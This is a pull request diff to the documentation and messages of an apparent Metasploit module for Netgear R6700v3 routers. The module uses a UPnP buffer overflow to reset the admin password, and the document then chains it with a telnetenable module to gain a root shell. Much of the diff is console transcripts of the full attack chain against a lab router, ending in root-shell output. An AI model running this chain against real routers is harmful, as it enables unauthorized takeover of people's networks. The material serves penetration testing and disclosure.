### PR TITLE
Netgear r6700 lan rce

### DIFF
--- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
@@ -1,33 +1,28 @@
 ## Vulnerable Application
 
-This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the
-router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password
-of the "admin" user on affected systems back to its factory default of "password". Support for other versions has not
-been added due to time constraints; users are encouraged to refer to the advisory for details on how to update the
-offset to the admin password reset functionality to support other firmware versions.
+This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),
+on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset
+the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by
+using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent
+computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only
+supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58
+firmware, however support for other firmware versions may be added in the future.
 
-The vulnerability can only be exploited by an attacker on the LAN side of the router, however it can be exploited
-by unauthenticated attackers. It will reset admin password to a factory defaults "password". Successful exploitation
-will crash the upnpd daemon and it will not restart, so attackers can only exploit this vulnerability once per reboot
-of the router. After using this module, to achieve code execution, do the following steps manually:
+Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
+special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
+then log into this telnet server using the new password, and obtain a shell as the "root" user.
 
-1. Login to 192.168.1.1 with creds 'admin:password', then:
-    * Go to Advanced -> Administration -> Set Password
- 	* Change the password from 'password' to <WHATEVER>
-2. Run metasploit as root, then:
- 	* use exploit/linux/telnet/netgear_telnetenable
- 	* set interface <INTERFACE_CONNECTED_TO_ROUTER>
- 	* set rhost 192.168.1.1
- 	* set username admin
- 	* set password <WHATEVER>
- 	* run it and login with 'admin:<WHATEVER>'
-3. Enjoy your root shell!
+These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
+It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.
+As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit
+this vulnerability once per reboot of the router.
 
-This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the team Flashback (Pedro Ribeiro + Radek Domanski).
+This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
+Radek Domanski).
 
-Vulnerable firmware versions can be downloaded using the following links:
-* [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip)
-* [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
+The vulnerable firmware versions this exploit supports can be downloaded from the following links:
+* [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](https://web.archive.org/web/20200630213752if_/https://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip)
+* [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](https://web.archive.org/web/20200630213830if_/https://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
 
 ## Verification Steps
 

--- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
@@ -1,0 +1,114 @@
+## Description
+
+This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58.
+The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to use a default admin password to login to web interface and use a 'telnetenable' module to gain root shell.
+
+This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the team Flashback (Pedro Ribeiro + Radek Domanski).
+
+## Vulnerable Application
+
+* Netgear R6700v3 firmware version V1.0.4.82_10.0.57
+* Netgear R6700v3 firmware version V1.0.4.84_10.0.58
+
+[Netgear R6700v3 Firmware V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
+
+
+
+## Verification Steps
+  Example steps in this format:
+
+  1. Connect to a target on the LAN interface
+  2. Start msfconsole
+  3. Do: ```use auxiliary/admin/http/netgear_r6700_pass_reset```
+  4. Set RHOST
+  5. Do ```check```
+  6. Do: ```run```
+  7. Admin password has been reset to default `password`
+
+## Options
+```
+Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    5000             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+```
+
+## Scenarios
+~~~
+msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check 
+
+[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
+[+] 192.168.1.1:5000 - The target is vulnerable.
+
+msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > run
+[*] Running module against 192.168.1.1
+
+[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
+[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
+[*] To achieve code execution, do the following steps manually:
+[*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
+[*] 	1.1- go to Advanced -> Administration -> Set Password
+[*] 	1.2- Change the password from 'password' to <WHATEVER>
+[*] 2- Run metasploit as root, then:
+[*] 	2.1- use exploit/linux/telnet/netgear_telnetenable
+[*] 	2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
+[*] 	2.3- set rhost 192.168.1.1
+[*] 	2.3- set username admin
+[*] 	2.4- set password <WHATEVER>
+[*] 	2.5- run it and login with 'admin:<WHATEVER>'
+[*] 3- Enjoy your root shell!
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > use exploit/linux/telnet/netgear_telnetenable
+msf5 exploit(linux/telnet/netgear_telnetenable) > ifconfig | grep enx
+[*] exec: ifconfig | grep enx
+
+enxd03745775fdd: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
+msf5 exploit(linux/telnet/netgear_telnetenable) > set interface enxd03745775fdd
+interface => enxd03745775fdd
+msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
+username => admin
+msf5 exploit(linux/telnet/netgear_telnetenable) > set password Flashback
+password => Flashback
+msf5 exploit(linux/telnet/netgear_telnetenable) > set timeout 1500
+timeout => 1500
+msf5 exploit(linux/telnet/netgear_telnetenable) > run
+
+[+] 192.168.1.1:23 - Detected telnetenabled on UDP
+[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP
+[+] 192.168.1.1:23 - Found MAC address
+[+] 192.168.1.1:23 - Using creds admin:Flashback
+[*] 192.168.1.1:23 - Generating magic packet
+[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
+[*] 192.168.1.1:23 - Sending magic packet
+[*] 192.168.1.1:23 - Disconnecting from telnetenabled
+[*] 192.168.1.1:23 - Waiting for telnetd
+[*] 192.168.1.1:23 - Connecting to telnetd
+[*] Found shell.
+[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-22 17:52:25 +0200
+
+ login: admin
+admin
+Password: Flashback
+
+
+
+BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+
+# id
+id
+uid=0(admin) gid=0(root)
+# uname -a
+uname -a
+Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
+
+~~~

--- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
@@ -1,7 +1,7 @@
-## Description
+## Vulnerable Application
 
-This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the 
-router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password 
+This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the
+router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password
 of the "admin" user on affected systems back to its factory default of "password". Support for other versions has not
 been added due to time constraints; users are encouraged to refer to the advisory for details on how to update the
 offset to the admin password reset functionality to support other firmware versions.
@@ -12,7 +12,7 @@ will crash the upnpd daemon and it will not restart, so attackers can only explo
 of the router. After using this module, to achieve code execution, do the following steps manually:
 
 1. Login to 192.168.1.1 with creds 'admin:password', then:
-    * go to Advanced -> Administration -> Set Password
+    * Go to Advanced -> Administration -> Set Password
  	* Change the password from 'password' to <WHATEVER>
 2. Run metasploit as root, then:
  	* use exploit/linux/telnet/netgear_telnetenable
@@ -25,13 +25,11 @@ of the router. After using this module, to achieve code execution, do the follow
 
 This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the team Flashback (Pedro Ribeiro + Radek Domanski).
 
-## Vulnerable Application
-
+Vulnerable firmware versions can be downloaded using the following links:
 * [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip)
 * [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
 
 ## Verification Steps
-  Example steps in this format:
 
   1. Connect the R6700v3 router to your local area network and ensure you can access it.
   2. Browse to the admin portal for the router, which will be located by default at `http://192.168.1.1`.
@@ -43,7 +41,7 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea
   8. Set RHOST
   9. Run ```check``` and verify that the target is vulnerable.
   10. Do: ```run```
-  11. Browse admin portal for the router, and 
+  11. Browse admin portal for the router, and
   verify you can successfully log in with the username `admin` and the password `password`.
 
 ## Options
@@ -52,7 +50,7 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea
 
 IP address of the LAN interface of the vulnerable target.
 
-### RPORT 
+### RPORT
 
 upnpd port on the target. Default 5000.
 
@@ -61,110 +59,216 @@ upnpd port on the target. Default 5000.
 ### Netgear R6700v3 firmware version V1.0.4.84_10.0.58
 
 ```
-msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOST 192.168.1.1
-RHOST => 192.168.1.1
-msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check 
+    msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
+    
+    Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
+    
+       Name     Current Setting  Required  Description
+       ----     ---------------  --------  -----------
+       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+       RPORT    5000             yes       The target port (TCP)
+       SSL      false            no        Negotiate SSL/TLS for outgoing connections
+       VHOST                     no        HTTP server virtual host
+    
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
+    RHOSTS => 192.168.1.1
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
+    
+    [*] Target is running firmware version 1.0.4.84
+    [*] 192.168.1.1:5000 - The target appears to be vulnerable.
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
+    [*] Running module against 192.168.1.1
+    
+    [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
+    [+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
+    [*] To achieve code execution, do the following steps manually:
+    [*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
+    [*]     1.1- go to Advanced -> Administration -> Set Password
+    [*]     1.2- Change the password from 'password' to <WHATEVER>
+    [*] 2- Run metasploit as root, then:
+    [*]     2.1- use exploit/linux/telnet/netgear_telnetenable
+    [*]     2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
+    [*]     2.3- set rhost 192.168.1.1
+    [*]     2.3- set username admin
+    [*]     2.4- set password <WHATEVER>
+    [*]     2.5- OPTIONAL: set timeout 1500
+    [*]     2.6- OPTIONAL: set MAC <ROUTERS_MAC>
+    [*]     2.7- run it and login with 'admin:<WHATEVER>'
+    [*] 3- Enjoy your root shell!
+    [*] Auxiliary module execution completed
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
+```
 
-[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
-[+] 192.168.1.1:5000 - The target is vulnerable.
+Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
+session running as `root`, entered the following commands:
 
-msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > run
-[*] Running module against 192.168.1.1
-
-[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
-[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
-[*] To achieve code execution, do the following steps manually:
-[*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
-[*] 	1.1- go to Advanced -> Administration -> Set Password
-[*] 	1.2- Change the password from 'password' to <WHATEVER>
-[*] 2- Run metasploit as root, then:
-[*] 	2.1- use exploit/linux/telnet/netgear_telnetenable
-[*] 	2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
-[*] 	2.3- set rhost 192.168.1.1
-[*] 	2.3- set username admin
-[*] 	2.4- set password <WHATEVER>
-[*] 	2.5- run it and login with 'admin:<WHATEVER>'
-[*] 3- Enjoy your root shell!
-[*] Auxiliary module execution completed
-msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > use exploit/linux/telnet/netgear_telnetenable
-msf5 exploit(linux/telnet/netgear_telnetenable) > ifconfig | grep enx
-[*] exec: ifconfig | grep enx
-
-enxd03745775fdd: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
-msf5 exploit(linux/telnet/netgear_telnetenable) > set interface enxd03745775fdd
-interface => enxd03745775fdd
-msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
-rhost => 192.168.1.1
-msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
-username => admin
-msf5 exploit(linux/telnet/netgear_telnetenable) > set password Flashback
-password => Flashback
-msf5 exploit(linux/telnet/netgear_telnetenable) > set timeout 1500
-timeout => 1500
-msf5 exploit(linux/telnet/netgear_telnetenable) > run
-
-[+] 192.168.1.1:23 - Detected telnetenabled on UDP
-[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP
-[+] 192.168.1.1:23 - Found MAC address
-[+] 192.168.1.1:23 - Using creds admin:Flashback
-[*] 192.168.1.1:23 - Generating magic packet
-[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
-[*] 192.168.1.1:23 - Sending magic packet
-[*] 192.168.1.1:23 - Disconnecting from telnetenabled
-[*] 192.168.1.1:23 - Waiting for telnetd
-[*] 192.168.1.1:23 - Connecting to telnetd
-[*] Found shell.
-[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-22 17:52:25 +0200
-
- login: admin
-admin
-Password: Flashback
-
-
-
-BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
-Enter 'help' for a list of built-in commands.
-
-# id
-id
-uid=0(admin) gid=0(root)
-# uname -a
-uname -a
-Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
-
+```
+    msf5 > use exploit/linux/telnet/netgear_telnetenable
+    [*] No payload configured, defaulting to cmd/unix/interact
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
+    username => admin
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
+    password => testing123
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
+    MAC => D56C89FC94C9
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1
+    RHOSTS => 192.168.1.1
+    msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
+    
+    [+] 192.168.1.1:23 - Detected telnetenabled on UDP
+    [+] 192.168.1.1:23 - Using creds admin:testing123
+    [*] 192.168.1.1:23 - Generating magic packet
+    [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
+    [*] 192.168.1.1:23 - Sending magic packet
+    [*] 192.168.1.1:23 - Disconnecting from telnetenabled
+    [*] 192.168.1.1:23 - Waiting for telnetd
+    [*] 192.168.1.1:23 - Connecting to telnetd
+    [*] Found shell.
+    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:57:33 -0500
+    
+    
+    
+    Login incorrect
+     login: admin
+    admin
+    Password: testing123
+    
+    
+    
+    BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
+    Enter 'help' for a list of built-in commands.
+    
+    # id
+    id
+    uid=0(admin) gid=0(root)
+    # uname -a
+    uname -a
+    Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
+    #
 ```
 
 ### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57
 
 ```
-msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
+    msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
+    
+    Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
+    
+       Name     Current Setting  Required  Description
+       ----     ---------------  --------  -----------
+       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+       RPORT    5000             yes       The target port (TCP)
+       SSL      false            no        Negotiate SSL/TLS for outgoing connections
+       VHOST                     no        HTTP server virtual host
+    
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
+    RHOSTS => 192.168.1.1
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
+    
+    [*] Target is running firmware version 1.0.4.82
+    [*] 192.168.1.1:5000 - The target appears to be vulnerable.
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
+    [*] Running module against 192.168.1.1
+    
+    [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.
+    [+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
+    [*] To achieve code execution, do the following steps manually:
+    [*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
+    [*]     1.1- go to Advanced -> Administration -> Set Password
+    [*]     1.2- Change the password from 'password' to <WHATEVER>
+    [*] 2- Run metasploit as root, then:
+    [*]     2.1- use exploit/linux/telnet/netgear_telnetenable
+    [*]     2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
+    [*]     2.3- set rhost 192.168.1.1
+    [*]     2.3- set username admin
+    [*]     2.4- set password <WHATEVER>
+    [*]     2.5- OPTIONAL: set timeout 1500
+    [*]     2.6- OPTIONAL: set MAC <ROUTERS_MAC>
+    [*]     2.7- run it and login with 'admin:<WHATEVER>'
+    [*] 3- Enjoy your root shell!
+    [*] Auxiliary module execution completed
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
+```
 
-Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
+Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
+session running as `root`, entered the following commands:
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT    5000             yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   VHOST                     no        HTTP server virtual host
-
-msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
-[*] Running module against 192.168.1.1
-
-[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.
-[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
-[*] To achieve code execution, do the following steps manually:
-[*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
-[*]     1.1- go to Advanced -> Administration -> Set Password
-[*]     1.2- Change the password from 'password' to <WHATEVER>
-[*] 2- Run metasploit as root, then:
-[*]     2.1- use exploit/linux/telnet/netgear_telnetenable
-[*]     2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
-[*]     2.3- set rhost 192.168.1.1
-[*]     2.3- set username admin
-[*]     2.4- set password <WHATEVER>
-[*]     2.5- run it and login with 'admin:<WHATEVER>'
-[*] 3- Enjoy your root shell!
-[*] Auxiliary module execution completed
+```
+    msf5 > use exploit/linux/telnet/netgear_telnetenable
+    [*] No payload configured, defaulting to cmd/unix/interact
+    msf5 exploit(linux/telnet/netgear_telnetenable) > show options
+    
+    Module options (exploit/linux/telnet/netgear_telnetenable):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       FILTER                      no        The filter string for capturing traffic
+       INTERFACE                   no        The name of the interface
+       MAC                         no        MAC address of device
+       PASSWORD                    no        Password on device
+       PCAPFILE                    no        The name of the PCAP capture file to process
+       RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+       RPORT      23               yes       The target port (TCP)
+       SNAPLEN    65535            yes       The number of bytes to capture
+       TIMEOUT    500              yes       The number of seconds to wait for new data
+       USERNAME                    no        Username on device
+    
+    
+    Payload options (cmd/unix/interact):
+    
+       Name  Current Setting  Required  Description
+       ----  ---------------  --------  -----------
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Automatic (detect TCP or UDP)
+    
+    
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1
+    RHOST => 192.168.1.1
+    set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
+    username => admin
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
+    password => testing123
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
+    MAC => D56C89FC94C9
+    msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
+    
+    [+] 192.168.1.1:23 - Detected telnetenabled on UDP
+    [+] 192.168.1.1:23 - Using creds admin:testing123
+    [*] 192.168.1.1:23 - Generating magic packet
+    [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
+    [*] 192.168.1.1:23 - Sending magic packet
+    [*] 192.168.1.1:23 - Disconnecting from telnetenabled
+    [*] 192.168.1.1:23 - Waiting for telnetd
+    [*] 192.168.1.1:23 - Connecting to telnetd
+    [*] Found shell.
+    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:14:08 -0500
+    
+    
+    
+    Login incorrect
+     login: admin
+    admin
+    Password: testing123
+    
+    
+    
+    BusyBox v1.7.2 (2019-07-29 20:56:07 CST) built-in shell (ash)
+    Enter 'help' for a list of built-in commands.
+    
+    # id
+    id
+    uid=0(admin) gid=0(root)
+    # uname -a
+    uname -a
+    Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Mon Jul 29 19:43:55 CST 2019 armv7l unknown
+    #
 ```

--- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
@@ -10,7 +10,7 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea
 * Netgear R6700v3 firmware version V1.0.4.82_10.0.57
 * Netgear R6700v3 firmware version V1.0.4.84_10.0.58
 
-[Netgear R6700v3 Firmware V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
+[Netgear R6700v3 Firmware V1.0.4.84_10.0.5](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
 
 
 

--- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
@@ -1,11 +1,18 @@
 ## Description
 
-This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58. Previous versions or models might also be vulnerable but they were not tested and would require additional offset information to work properly. Refer to the advisory for details on how to identify offsets in new versions.
+This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the 
+router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password 
+of the "admin" user on affected systems back to its factory default of "password". Support for other versions has not
+been added due to time constraints; users are encouraged to refer to the advisory for details on how to update the
+offset to the admin password reset functionality to support other firmware versions.
 
-The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. It will reset admin password to a factory defaults "password". After using this module, to achieve code execution, do the following steps manually:
+The vulnerability can only be exploited by an attacker on the LAN side of the router, however it can be exploited
+by unauthenticated attackers. It will reset admin password to a factory defaults "password". Successful exploitation
+will crash the upnpd daemon and it will not restart, so attackers can only exploit this vulnerability once per reboot
+of the router. After using this module, to achieve code execution, do the following steps manually:
 
 1. Login to 192.168.1.1 with creds 'admin:password', then:
-  * go to Advanced -> Administration -> Set Password
+    * go to Advanced -> Administration -> Set Password
  	* Change the password from 'password' to <WHATEVER>
 2. Run metasploit as root, then:
  	* use exploit/linux/telnet/netgear_telnetenable
@@ -23,18 +30,21 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea
 * [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip)
 * [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
 
-
-
 ## Verification Steps
   Example steps in this format:
 
-  1. Connect to a target on the LAN interface
-  2. Start msfconsole
-  3. Do: ```use auxiliary/admin/http/netgear_r6700_pass_reset```
-  4. Set RHOST
-  5. Do ```check```
-  6. Do: ```run```
-  7. Admin password has been reset to default `password`
+  1. Connect the R6700v3 router to your local area network and ensure you can access it.
+  2. Browse to the admin portal for the router, which will be located by default at `http://192.168.1.1`.
+  3. Go to Advanced -> Administration -> Set Password
+  4. Change the password from `password` to another password of your choice.
+  5. Log out and browse again to `http://192.168.1.1`. Verify that you can log into the router with the new password.
+  6. Start msfconsole
+  7. Do: ```use auxiliary/admin/http/netgear_r6700_pass_reset```
+  8. Set RHOST
+  9. Run ```check``` and verify that the target is vulnerable.
+  10. Do: ```run```
+  11. Browse admin portal for the router, and 
+  verify you can successfully log in with the username `admin` and the password `password`.
 
 ## Options
 

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -161,7 +161,9 @@ class MetasploitModule < Msf::Auxiliary
       print_status("\t2.3- set rhost #{rhost}")
       print_status("\t2.3- set username admin")
       print_status("\t2.4- set password <WHATEVER>")
-      print_status("\t2.5- run it and login with 'admin:<WHATEVER>'")
+      print_status("\t2.5- OPTIONAL: set timeout 1500")
+      print_status("\t2.6- OPTIONAL: set MAC <ROUTERS_MAC>")
+      print_status("\t2.7- run it and login with 'admin:<WHATEVER>'")
       print_status("3- Enjoy your root shell!")
     end
   end

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -10,36 +10,36 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset',
-        'Description'    => %q{
-        This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on
-        the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57
-        and V1.0.0.4.84_10.0.58.
+        'Name' => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset',
+        'Description' => %q{
+          This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on
+          the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57
+          and V1.0.0.4.84_10.0.58.
 
-        The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
